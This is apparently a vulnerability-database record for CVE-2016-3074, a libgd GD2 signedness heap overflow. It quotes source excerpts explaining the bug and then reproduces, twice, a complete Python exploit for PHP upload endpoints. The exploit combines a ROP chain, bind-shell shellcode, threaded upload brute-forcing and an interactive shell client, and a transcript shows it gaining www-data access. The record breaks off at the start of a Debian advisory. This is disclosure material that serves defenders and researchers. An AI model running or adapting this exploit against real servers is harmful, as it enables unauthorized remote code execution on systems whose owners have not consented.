155 if (gd2_compressed (*fmt)) { \n| ... \n| 163 for (i = 0; i < nc; i++) { \n| ... 
\n| 167 if (gdGetInt (&cidx[i].size, in) != 1) { \n| 168 goto fail2; \n| 169 }; \n| 170 }; \n| 171 *chunkIdx = cidx; \n| 172 }; \n| ... \n| 181 } \n`---- \n \n`gdImageCreateFromGd2Ctx()' and `gdImageCreateFromGd2PartCtx()' then \nallocate memory for the compressed data based on the value of the \nlargest chunk size: \n \nlibgd-2.1.1/src/gd_gd2.c: \n,---- \n| 371|637 if (gd2_compressed (fmt)) { \n| 372|638 /* Find the maximum compressed chunk size. */ \n| 373|639 compMax = 0; \n| 374|640 for (i = 0; (i < nc); i++) { \n| 375|641 if (chunkIdx[i].size > compMax) { \n| 376|642 compMax = chunkIdx[i].size; \n| 377|643 }; \n| 378|644 }; \n| 379|645 compMax++; \n| ...|... \n| 387|656 compBuf = gdCalloc (compMax, 1); \n| ...|... \n| 393|661 }; \n`---- \n \nA size of <= 0 results in `compMax' retaining its initial value during \nthe loop, followed by it being incremented to 1. Since `compMax' is \nused as the nmemb for `gdCalloc()', this leads to a 1*1 byte allocation \nfor `compBuf'. \n \nThis is followed by compressed data being read to `compBuf' based on the \ncurrent (potentially negative) chunk size: \n \nlibgd-2.1.1/src/gd_gd2.c: \n,---- \n| 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in) \n| 340 { \n| ... \n| 413 if (gd2_compressed (fmt)) { \n| 414 \n| 415 chunkLen = chunkMax; \n| 416 \n| 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset, \n| 418 compBuf, \n| 419 chunkIdx[chunkNum].size, \n| 420 (char *) chunkBuf, &chunkLen, in)) { \n| 421 GD2_DBG (printf (\"Error reading comproessed chunk\\n\")); \n| 422 goto fail; \n| 423 }; \n| 424 \n| 425 chunkPos = 0; \n| 426 }; \n| ... \n| 501 } \n`---- \n \n \nlibgd-2.1.1/src/gd_gd2.c: \n,---- \n| 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h) \n| 586 { \n| ... \n| 713 if (!gd2_compressed (fmt)) { \n| ... 
\n| 731 } else { \n| 732 chunkNum = cx + cy * ncx; \n| 733 \n| 734 chunkLen = chunkMax; \n| 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset, \n| 736 compBuf, \n| 737 chunkIdx[chunkNum].size, \n| 738 (char *) chunkBuf, &chunkLen, in)) { \n| 739 printf (\"Error reading comproessed chunk\\n\"); \n| 740 goto fail2; \n| 741 }; \n| ... \n| 746 }; \n| ... \n| 815 } \n`---- \n \nThe size is subsequently interpreted as a size_t by `fread()' or \n`memcpy()', depending on how the image is read: \n \nlibgd-2.1.1/src/gd_gd2.c: \n,---- \n| 221 static int \n| 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf, \n| 223 uLongf * chunkLen, gdIOCtx * in) \n| 224 { \n| ... \n| 236 if (gdGetBuf (compBuf, compSize, in) != compSize) { \n| 237 return FALSE; \n| 238 }; \n| ... \n| 251 } \n`---- \n \nlibgd-2.1.1/src/gd_io.c: \n,---- \n| 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx) \n| 212 { \n| 213 return (ctx->getBuf)(ctx, buf, size); \n| 214 } \n`---- \n \n \nFor file contexts: \n \nlibgd-2.1.1/src/gd_io_file.c: \n,---- \n| 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f) \n| 53 { \n| ... \n| 67 ctx->ctx.getBuf = fileGetbuf; \n| ... \n| 76 } \n| ... \n| 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size) \n| 93 { \n| 94 fileIOCtx *fctx; \n| 95 fctx = (fileIOCtx *)ctx; \n| 96 \n| 97 return (fread(buf, 1, size, fctx->f)); \n| 98 } \n`---- \n \n \nAnd for dynamic contexts: \n \nlibgd-2.1.1/src/gd_io_dp.c: \n,---- \n| 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag) \n| 75 { \n| ... \n| 95 ctx->ctx.getBuf = dynamicGetbuf; \n| ... \n| 104 } \n| ... \n| 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len) \n| 257 { \n| ... \n| 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen); \n| ... 
\n| 284 } \n`---- \n \n \nPoC \n=== \n \nAgainst Ubuntu 15.10 amd64 running nginx with php5-fpm and php5-gd [3]: \n \n,---- \n| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php \n| [*] this may take a while \n| [*] offset 912 of 10000... \n| [+] connected to 1.2.3.4:5555 \n| id \n| uid=33(www-data) gid=33(www-data) groups=33(www-data) \n| \n| uname -a \n| Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC \n| 2016 x86_64 x86_64 x86_64 GNU/Linux \n| \n| dpkg -l|grep -E \"php5-(fpm|gd)\" \n| ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ... \n| ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ... \n| \n| cat upload.php \n| <?php \n| imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]); \n| ?> \n`---- \n \n \nSolution \n======== \n \nThis bug has been fixed in git HEAD [4]. \n \n \n \nFootnotes \n_________ \n \n[1] [http://libgd.org/] \n \n[2] [https://en.wikipedia.org/wiki/Libgd] \n \n[3] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-3074] \n \n[4] [https://github.com/libgd/libgd/commit/2bb97f407c1145c850416a3bfbcc8cf124e68a19] \n \n \n-- \nHans Jerry Illikainen \n \n \nProof of concept: \n \n#!/usr/bin/env python2 \n# \n# PoC for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and \n# php5-fpm running behind nginx. \n# \n# ,---- \n# | $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php \n# | [*] this may take a while \n# | [*] offset 912 of 10000... \n# | [+] connected to 1.2.3.4:5555 \n# | id \n# | uid=33(www-data) gid=33(www-data) groups=33(www-data) \n# | \n# | uname -a \n# | Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC \n# | 2016 x86_64 x86_64 x86_64 GNU/Linux \n# | \n# | dpkg -l|grep -E \"php5-(fpm|gd)\" \n# | ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ... \n# | ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ... 
\n# | \n# | cat upload.php \n# | <?php \n# | imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]); \n# | ?> \n# `---- \n# \n# - Hans Jerry Illikainen \n# \nimport sys \nimport os \nimport zlib \nimport socket \nimport threading \nimport argparse \nimport urlparse \nfrom struct import pack \n \nimport requests \n \n# non-optimized bindshell from binjitsu \n# \n# context(arch=\"amd64\", os=\"linux\") \n# asm(shellcraft.bindsh(port, \"ipv4\")) \nshellcode = [ \n\"\\x6a\\x29\\x58\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x99\\x0f\\x05\\x52\\xba\", \n\"%(fam-and-port)s\\x52\\x6a\\x10\\x5a\\x48\\x89\\xc5\\x48\\x89\\xc7\", \n\"\\x6a\\x31\\x58\\x48\\x89\\xe6\\x0f\\x05\\x6a\\x32\\x58\\x48\\x89\\xef\", \n\"\\x6a\\x01\\x5e\\x0f\\x05\\x6a\\x2b\\x58\\x48\\x89\\xef\\x31\\xf6\\x99\", \n\"\\x0f\\x05\\x48\\x89\\xc5\\x6a\\x03\\x5e\\x48\\xff\\xce\\x78\\x0b\\x56\", \n\"\\x6a\\x21\\x58\\x48\\x89\\xef\\x0f\\x05\\xeb\\xef\\x6a\\x68\\x48\\xb8\", \n\"\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x2f\\x73\\x50\\x6a\\x3b\\x58\\x48\\x89\", \n\"\\xe7\\x31\\xf6\\x99\\x0f\\x05\" \n] \n \ngadgets = [ \n\"\\x90\" * 40, \n \n# [16] \n# \n# 0xb6eca2: popfq \n# 0xb6eca3: callq *%rsp \npack(\"<Q\", 0xb6eca2), \n \n\"%(pad)s\", \n \n# [2] \n# \n# 0x4dbe8c: add $0xd8,%rsp \n# 0x4dbe93: retq \npack(\"<Q\", 0x4dbe8c), \n \n\"\\x90\" * 48, \n \n# [1] \n# \n# (gdb) x/x {void *}($rsp + 8) \n# 0x12d7d60: 0x9090909090909090 \n# \n# 0xa91f35: rex.WXB pop %r14 \n# 0xa91f37: mov $0x3,%bh \n# 0xa91f39: pop %rsp \n# 0xa91f3a: retq \npack(\"<Q\", 0xa91f35), \n \n\"\\x90\" * 152, \n \n# [0] \n# \n# (gdb) x/i $rip \n# => 0x7f91acf61f46: callq *0x70(%rax) \n# \n# (gdb) x/gx 0x432b80 \n# 0x432b80: 0x0000000000547880 \n# \n# (gdb) x/3i 0x0000000000547880 \n# 0x547880: push %rbx \n# 0x547881: mov %rdi,%rbx \n# 0x547884: callq *0x20(%rdi) \npack(\"<Q\", 0x432b80 - 0x70), \n \n# [3] \n# \n# 0x463e2c: pop %rbx \n# 0x463e2d: retq \npack(\"<Q\", 0x463e2c), \n \n# [7] \n# \n# 0x463b1d: pop %r12 \n# 0x463b1f: retq \npack(\"<Q\", 0x463b1d), \n \n# [4] \n# 
\n# 0x473053: pop %rax \n# 0x473054: retq \npack(\"<Q\", 0x473053), \n \n# [6] \n# \n# 0xa8bc37: push %rdx \n# 0xa8bc38: jmpq *%rbx \npack(\"<Q\", 0xa8bc37), \n \n# [5] \n# \n# 0x7b2eaf: mov %r9,%rdx \n# 0x7b2eb2: jmpq *%rax \npack(\"<Q\", 0x7b2eaf), \n \n# [8] \n# \n# 0x552768: mov %rdi,%rax \n# 0x55276b: retq \npack(\"<Q\", 0x552768), \n \n# [9] \n# \n# 0x463e2c: pop %rbx \n# 0x463e2d: retq \npack(\"<Q\", 0x463e2c), \npack(\"<Q\", 0xfffff000), \n \n# [10] \n# \n# 0xb6c734: and %ebx,%eax \n# 0xb6c736: es retq \npack(\"<Q\", 0xb6c734), \n \n# [11] \n# \n# 0x4c93e9: xchg %eax,%ebx \n# 0x4c93ea: retq \npack(\"<Q\", 0x4c93e9), \n \n# [12] \n# \n# 0x406a08: pop %rcx (len, 0x5555) \n# 0x406a09: retq \npack(\"<Q\", 0x406a08), \npack(\"<Q\", 0x5555), \n \n# [13] \n# \n# 0xaf58fd: pop %rdx (PROT_READ|PROT_WRITE|PROT_EXEC) \n# 0xaf58fe: retq \npack(\"<Q\", 0xaf58fd), \npack(\"<Q\", 7), \n \n# [14] \n# \n# 0x473053: pop %rax (mprotect) \n# 0x473054: retq \npack(\"<Q\", 0x473053), \npack(\"<Q\", 125), \n \n# [15] \n# \n# 0x53f9f8: int $0x80 \n# 0x53f9fa: mov 0x38(%r12),%rsi \n# 0x53f9ff: mov $0x8f,%edi \n# 0x53fa04: callq *0x28(%r12) \npack(\"<Q\", 0x53f9f8), \n \n\"\\x90\" * 100, \n] \n \n# gd.h: #define gdMaxColors 256 \ngd_max_colors = 256 \n \n \ndef make_gd2(chunks): \ngd2 = [ \n\"gd2\\x00\", # signature \npack(\">H\", 2), # version \npack(\">H\", 1), # image size (x) \npack(\">H\", 1), # image size (y) \npack(\">H\", 0x40), # chunk size (0x40 <= cs <= 0x80) \npack(\">H\", 2), # format (GD2_FMT_COMPRESSED) \npack(\">H\", 1), # num of chunks wide \npack(\">H\", len(chunks)) # num of chunks high \n] \ncolors = [ \npack(\">B\", 0), # trueColorFlag \npack(\">H\", 0), # im->colorsTotal \npack(\">I\", 0), # im->transparent \npack(\">I\", 0) * gd_max_colors # red[i], green[i], blue[i], alpha[i] \n] \n \noffset = len(\"\".join(gd2)) + len(\"\".join(colors)) + len(chunks) * 8 \nfor data, size in chunks: \ngd2.append(pack(\">I\", offset)) # cidx[i].offset \ngd2.append(pack(\">I\", 
size)) # cidx[i].size \noffset += size \n \nreturn \"\".join(gd2 + colors + [data for data, size in chunks]) \n \n \ndef connect(host, port): \naddr = socket.gethostbyname(host) \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect((addr, port)) \nexcept socket.error: \nreturn \n \nprint(\"\\n[+] connected to %s:%d\" % (host, port)) \nif os.fork() == 0: \nwhile True: \ntry: \ndata = sock.recv(8192) \nexcept KeyboardInterrupt: \nsys.exit(\"\\n[!] receiver aborting\") \nif data == \"\": \nsys.exit(\"[!] receiver aborting\") \nsys.stdout.write(data) \nelse: \nwhile True: \ntry: \ncmd = sys.stdin.readline() \nexcept KeyboardInterrupt: \nsock.close() \nsys.exit(\"[!] sender aborting\") \nsock.send(cmd) \n \n \ndef send_gd2(url, gd2, code): \nfiles = {\"file\": gd2} \ntry: \nreq = requests.post(url, files=files, timeout=5) \ncode.append(req.status_code) \nexcept requests.exceptions.ReadTimeout: \npass \n \n \ndef get_payload(offset, port): \nrop = \"\".join(gadgets) % {\"pad\": \"\\x90\" * offset} \n \nfam_and_port = pack(\"<I\", (socket.AF_INET | (socket.htons(port) << 16))) \nsc = \"\".join(shellcode) % {\"fam-and-port\": fam_and_port} \n \nreturn rop + sc \n \n \ndef get_args(): \np = argparse.ArgumentParser() \np.add_argument(\"--threads\", type=int, default=20) \np.add_argument(\"--bind-port\", type=int, default=8000) \np.add_argument(\"--offsets\", type=int, default=[0, 10000], nargs=2) \np.add_argument(\"url\") \nreturn p.parse_args() \n \n \ndef main(): \nargs = get_args() \nhost = urlparse.urlparse(args.url).netloc.split(\":\")[0] \n \nprint(\"[*] this may take a while\") \nfor i in range(args.offsets[0], args.offsets[1]): \nsys.stdout.write(\"\\r[*] offset %d of %d...\" % (i, args.offsets[1])) \nsys.stdout.flush() \n \nvalid = zlib.compress(\"A\" * 100, 0) \npayload = get_payload(i, args.bind_port) \ngd2 = make_gd2([(valid, len(valid)), (payload, 0xffffffff)]) \n \nthreads = [] \ncode = [] \nfor _ in range(args.threads): \nt = 
threading.Thread(target=send_gd2, args=(args.url, gd2, code)) \nt.start() \nthreads.append(t) \n \nfor t in threads: \nt.join() \n \nif 404 in code: \nsys.exit(\"\\n[-] 404: %s\" % args.url) \nconnect(host, args.bind_port) \n \nprint(\"\\n[-] nope...\") \n \nif __name__ == \"__main__\": \nmain() \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/136757/libgd-signedness.txt"}], "seebug": [{"lastseen": "2017-11-19T12:02:13", "description": "## Vulnerability details\n\nThe 4 bytes representing the chunk index size are stored in a signed integer, chunkIdx[i].size, by gdGetInt() during the parsing of GD2 headers:\n\nlibgd-2.1.1/src/gd_gd2.c:\n\n`,---- | 53 typedef struct { | 54 int offset; | 55 int size; | 56 } | 57 t_chunk_info; `----`\n\nlibgd-2.1.1/src/gd_gd2.c:\n\n`,---- | 65 static int | 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy, | 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy, | 68 t_chunk_info ** chunkIdx) | 69 { | ... | 73 t_chunk_info *cidx; | ... | 155 if (gd2_compressed (*fmt)) { | ... | 163 for (i = 0; i < nc; i++) { | ... | 167 if (gdGetInt (&cidx[i].size, in) != 1) { | 168 goto fail2; | 169 }; | 170 }; | 171 *chunkIdx = cidx; | 172 }; | ... | 181 } `----`\n\ngdImageCreateFromGd2Ctx() and gdImageCreateFromGd2PartCtx() then allocate memory for the compressed data based on the value of the largest chunk size:\n\nlibgd-2.1.1/src/gd_gd2.c:\n\n`,---- | 371/637 if (gd2_compressed (fmt)) { | 372/638 /* Find the maximum compressed chunk size. */ | 373/639 compMax = 0; | 374/640 for (i = 0; (i < nc); i++) { | 375/641 if (chunkIdx[i].size > compMax) { | 376/642 compMax = chunkIdx[i].size; | 377/643 }; | 378/644 }; | 379/645 compMax++; | ...|... | 387/656 compBuf = gdCalloc (compMax, 1); | ...|... 
| 393/661 }; `----`\n\nA size of <= 0 results in compMax retaining its initial value during the loop, followed by it being incremented to 1. Since compMax is used as the nmemb for gdCalloc(), this leads to a 1*1 byte allocation for compBuf.\n\nThis is followed by compressed data being read into compBuf based on the current (potentially negative) chunk size:\n\nlibgd-2.1.1/src/gd_gd2.c:\n\n`,---- | 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in) | 340 { | ... | 413 if (gd2_compressed (fmt)) { | 414 | 415 chunkLen = chunkMax; | 416 | 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset, | 418 compBuf, | 419 chunkIdx[chunkNum].size, | 420 (char *) chunkBuf, &chunkLen, in)) { | 421 GD2_DBG (printf (\"Error reading comproessed chunk\\n\")); | 422 goto fail; | 423 }; | 424 | 425 chunkPos = 0; | 426 }; | ... | 501 } `----`\n\nlibgd-2.1.1/src/gd_gd2.c:\n\n`,---- | 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h) | 586 { | ... | 713 if (!gd2_compressed (fmt)) { | ... | 731 } else { | 732 chunkNum = cx + cy * ncx; | 733 | 734 chunkLen = chunkMax; | 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset, | 736 compBuf, | 737 chunkIdx[chunkNum].size, | 738 (char *) chunkBuf, &chunkLen, in)) { | 739 printf (\"Error reading comproessed chunk\\n\"); | 740 goto fail2; | 741 }; | ... | 746 }; | ... | 815 } `----`\n\nThe size is subsequently interpreted as a size_t by fread() or memcpy(), depending on how the image is read:\n\nlibgd-2.1.1/src/gd_gd2.c:\n\n`,---- | 221 static int | 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf, | 223 uLongf * chunkLen, gdIOCtx * in) | 224 { | ... | 236 if (gdGetBuf (compBuf, compSize, in) != compSize) { | 237 return FALSE; | 238 }; | ... | 251 } `----`\n\nlibgd-2.1.1/src/gd_io.c:\n\n`,---- | 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx) | 212 { | 213 return (ctx->getBuf)(ctx, buf, size); | 214 } `----`\n\nFor file contexts:\n\nlibgd-2.1.1/src/gd_io_file.
c:\n\n`,---- | 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f) | 53 { | ... | 67 ctx->ctx. getBuf = fileGetbuf; | ... | 76 } | ... | 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size) | 93 { | 94 fileIOCtx *fctx; | 95 fctx = (fileIOCtx *)ctx; | 96 | 97 return (fread(buf, 1, size, fctx->f)); | 98 } `----` And for dynamic contexts:\n\nlibgd-2.1.1/src/gd_io_dp. c:\n\n`,---- | 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag) | 75 { | ... | 95 ctx->ctx. getBuf = dynamicGetbuf; | ... | 104 } | ... | 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len) | 257 { | ... | 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen); | ... | 284 } `----`\n", "published": "2017-01-18T00:00:00", "type": "seebug", "title": "libgd 2.1.1 - Signedness Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3074"], "modified": "2017-01-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92626", "id": "SSV:92626", "sourceData": "\n ```\r\n#!/usr/bin/env python2\r\n#\r\n# PoC for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and\r\n# php5-fpm running behind nginx.\r\n#\r\n# ,----\r\n# | $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php\r\n# | [*] this may take a while\r\n# | [*] offset 912 of 10000...\r\n# | [+] connected to 1.2.3.4:5555\r\n# | id\r\n# | uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n# |\r\n# | uname -a\r\n# | Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC\r\n# | 2016 x86_64 x86_64 x86_64 GNU/Linux\r\n# |\r\n# | dpkg -l|grep -E \"php5-(fpm|gd)\"\r\n# | ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...\r\n# | ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ...\r\n# |\r\n# | cat upload.php\r\n# | <?php\r\n# | imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]);\r\n# | ?>\r\n# `----\r\n#\r\n# - Hans Jerry Illikainen\r\n#\r\nimport sys\r\nimport os\r\nimport zlib\r\nimport socket\r\nimport threading\r\nimport argparse\r\nimport urlparse\r\nfrom struct import 
pack\r\n\r\nimport requests\r\n\r\n# non-optimized bindshell from binjitsu\r\n#\r\n# context(arch=\"amd64\", os=\"linux\")\r\n# asm(shellcraft.bindsh(port, \"ipv4\"))\r\nshellcode = [\r\n \"\\x6a\\x29\\x58\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x99\\x0f\\x05\\x52\\xba\",\r\n \"%(fam-and-port)s\\x52\\x6a\\x10\\x5a\\x48\\x89\\xc5\\x48\\x89\\xc7\",\r\n \"\\x6a\\x31\\x58\\x48\\x89\\xe6\\x0f\\x05\\x6a\\x32\\x58\\x48\\x89\\xef\",\r\n \"\\x6a\\x01\\x5e\\x0f\\x05\\x6a\\x2b\\x58\\x48\\x89\\xef\\x31\\xf6\\x99\",\r\n \"\\x0f\\x05\\x48\\x89\\xc5\\x6a\\x03\\x5e\\x48\\xff\\xce\\x78\\x0b\\x56\",\r\n \"\\x6a\\x21\\x58\\x48\\x89\\xef\\x0f\\x05\\xeb\\xef\\x6a\\x68\\x48\\xb8\",\r\n \"\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x2f\\x73\\x50\\x6a\\x3b\\x58\\x48\\x89\",\r\n \"\\xe7\\x31\\xf6\\x99\\x0f\\x05\"\r\n]\r\n\r\ngadgets = [\r\n \"\\x90\" * 40,\r\n\r\n # [16]\r\n #\r\n # 0xb6eca2: popfq\r\n # 0xb6eca3: callq *%rsp\r\n pack(\"<Q\", 0xb6eca2),\r\n\r\n \"%(pad)s\",\r\n\r\n # [2]\r\n #\r\n # 0x4dbe8c: add $0xd8,%rsp\r\n # 0x4dbe93: retq\r\n pack(\"<Q\", 0x4dbe8c),\r\n\r\n \"\\x90\" * 48,\r\n\r\n # [1]\r\n #\r\n # (gdb) x/x {void *}($rsp + 8)\r\n # 0x12d7d60: 0x9090909090909090\r\n #\r\n # 0xa91f35: rex.WXB pop %r14\r\n # 0xa91f37: mov $0x3,%bh\r\n # 0xa91f39: pop %rsp\r\n # 0xa91f3a: retq\r\n pack(\"<Q\", 0xa91f35),\r\n\r\n \"\\x90\" * 152,\r\n\r\n # [0]\r\n #\r\n # (gdb) x/i $rip\r\n # => 0x7f91acf61f46: callq *0x70(%rax)\r\n #\r\n # (gdb) x/gx 0x432b80\r\n # 0x432b80: 0x0000000000547880\r\n #\r\n # (gdb) x/3i 0x0000000000547880\r\n # 0x547880: push %rbx\r\n # 0x547881: mov %rdi,%rbx\r\n # 0x547884: callq *0x20(%rdi)\r\n pack(\"<Q\", 0x432b80 - 0x70),\r\n\r\n # [3]\r\n #\r\n # 0x463e2c: pop %rbx\r\n # 0x463e2d: retq\r\n pack(\"<Q\", 0x463e2c),\r\n\r\n # [7]\r\n #\r\n # 0x463b1d: pop %r12\r\n # 0x463b1f: retq\r\n pack(\"<Q\", 0x463b1d),\r\n\r\n # [4]\r\n #\r\n # 0x473053: pop %rax\r\n # 0x473054: retq\r\n pack(\"<Q\", 0x473053),\r\n\r\n # [6]\r\n #\r\n # 0xa8bc37: push %rdx\r\n # 0xa8bc38: jmpq 
*%rbx\r\n pack(\"<Q\", 0xa8bc37),\r\n\r\n # [5]\r\n #\r\n # 0x7b2eaf: mov %r9,%rdx\r\n # 0x7b2eb2: jmpq *%rax\r\n pack(\"<Q\", 0x7b2eaf),\r\n\r\n # [8]\r\n #\r\n # 0x552768: mov %rdi,%rax\r\n # 0x55276b: retq\r\n pack(\"<Q\", 0x552768),\r\n\r\n # [9]\r\n #\r\n # 0x463e2c: pop %rbx\r\n # 0x463e2d: retq\r\n pack(\"<Q\", 0x463e2c),\r\n pack(\"<Q\", 0xfffff000),\r\n\r\n # [10]\r\n #\r\n # 0xb6c734: and %ebx,%eax\r\n # 0xb6c736: es retq\r\n pack(\"<Q\", 0xb6c734),\r\n\r\n # [11]\r\n #\r\n # 0x4c93e9: xchg %eax,%ebx\r\n # 0x4c93ea: retq\r\n pack(\"<Q\", 0x4c93e9),\r\n\r\n # [12]\r\n #\r\n # 0x406a08: pop %rcx (len, 0x5555)\r\n # 0x406a09: retq\r\n pack(\"<Q\", 0x406a08),\r\n pack(\"<Q\", 0x5555),\r\n\r\n # [13]\r\n #\r\n # 0xaf58fd: pop %rdx (PROT_READ|PROT_WRITE|PROT_EXEC)\r\n # 0xaf58fe: retq\r\n pack(\"<Q\", 0xaf58fd),\r\n pack(\"<Q\", 7),\r\n\r\n # [14]\r\n #\r\n # 0x473053: pop %rax (mprotect)\r\n # 0x473054: retq\r\n pack(\"<Q\", 0x473053),\r\n pack(\"<Q\", 125),\r\n\r\n # [15]\r\n #\r\n # 0x53f9f8: int $0x80\r\n # 0x53f9fa: mov 0x38(%r12),%rsi\r\n # 0x53f9ff: mov $0x8f,%edi\r\n # 0x53fa04: callq *0x28(%r12)\r\n pack(\"<Q\", 0x53f9f8),\r\n\r\n \"\\x90\" * 100,\r\n]\r\n\r\n# gd.h: #define gdMaxColors 256\r\ngd_max_colors = 256\r\n\r\n\r\ndef make_gd2(chunks):\r\n gd2 = [\r\n \"gd2\\x00\", # signature\r\n pack(\">H\", 2), # version\r\n pack(\">H\", 1), # image size (x)\r\n pack(\">H\", 1), # image size (y)\r\n pack(\">H\", 0x40), # chunk size (0x40 <= cs <= 0x80)\r\n pack(\">H\", 2), # format (GD2_FMT_COMPRESSED)\r\n pack(\">H\", 1), # num of chunks wide\r\n pack(\">H\", len(chunks)) # num of chunks high\r\n ]\r\n colors = [\r\n pack(\">B\", 0), # trueColorFlag\r\n pack(\">H\", 0), # im->colorsTotal\r\n pack(\">I\", 0), # im->transparent\r\n pack(\">I\", 0) * gd_max_colors # red[i], green[i], blue[i], alpha[i]\r\n ]\r\n\r\n offset = len(\"\".join(gd2)) + len(\"\".join(colors)) + len(chunks) * 8\r\n for data, size in chunks:\r\n gd2.append(pack(\">I\", offset)) # 
cidx[i].offset\r\n gd2.append(pack(\">I\", size)) # cidx[i].size\r\n offset += size\r\n\r\n return \"\".join(gd2 + colors + [data for data, size in chunks])\r\n\r\n\r\ndef connect(host, port):\r\n addr = socket.gethostbyname(host)\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect((addr, port))\r\n except socket.error:\r\n return\r\n\r\n print(\"\\n[+] connected to %s:%d\" % (host, port))\r\n if os.fork() == 0:\r\n while True:\r\n try:\r\n data = sock.recv(8192)\r\n except KeyboardInterrupt:\r\n sys.exit(\"\\n[!] receiver aborting\")\r\n if data == \"\":\r\n sys.exit(\"[!] receiver aborting\")\r\n sys.stdout.write(data)\r\n else:\r\n while True:\r\n try:\r\n cmd = sys.stdin.readline()\r\n except KeyboardInterrupt:\r\n sock.close()\r\n sys.exit(\"[!] sender aborting\")\r\n sock.send(cmd)\r\n\r\n\r\ndef send_gd2(url, gd2, code):\r\n files = {\"file\": gd2}\r\n try:\r\n req = requests.post(url, files=files, timeout=5)\r\n code.append(req.status_code)\r\n except requests.exceptions.ReadTimeout:\r\n pass\r\n\r\n\r\ndef get_payload(offset, port):\r\n rop = \"\".join(gadgets) % {\"pad\": \"\\x90\" * offset}\r\n\r\n fam_and_port = pack(\"<I\", (socket.AF_INET | (socket.htons(port) << 16)))\r\n sc = \"\".join(shellcode) % {\"fam-and-port\": fam_and_port}\r\n\r\n return rop + sc\r\n\r\n\r\ndef get_args():\r\n p = argparse.ArgumentParser()\r\n p.add_argument(\"--threads\", type=int, default=20)\r\n p.add_argument(\"--bind-port\", type=int, default=8000)\r\n p.add_argument(\"--offsets\", type=int, default=[0, 10000], nargs=2)\r\n p.add_argument(\"url\")\r\n return p.parse_args()\r\n\r\n\r\ndef main():\r\n args = get_args()\r\n host = urlparse.urlparse(args.url).netloc.split(\":\")[0]\r\n\r\n print(\"[*] this may take a while\")\r\n for i in range(args.offsets[0], args.offsets[1]):\r\n sys.stdout.write(\"\\r[*] offset %d of %d...\" % (i, args.offsets[1]))\r\n sys.stdout.flush()\r\n\r\n valid = zlib.compress(\"A\" * 100, 0)\r\n payload = 
get_payload(i, args.bind_port)\r\n gd2 = make_gd2([(valid, len(valid)), (payload, 0xffffffff)])\r\n\r\n threads = []\r\n code = []\r\n for _ in range(args.threads):\r\n t = threading.Thread(target=send_gd2, args=(args.url, gd2, code))\r\n t.start()\r\n threads.append(t)\r\n\r\n for t in threads:\r\n t.join()\r\n\r\n if 404 in code:\r\n sys.exit(\"\\n[-] 404: %s\" % args.url)\r\n connect(host, args.bind_port)\r\n\r\n print(\"\\n[-] nope...\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n```\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92626"}], "debian": [{"lastseen": "2020-08-12T00:57:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3556-1 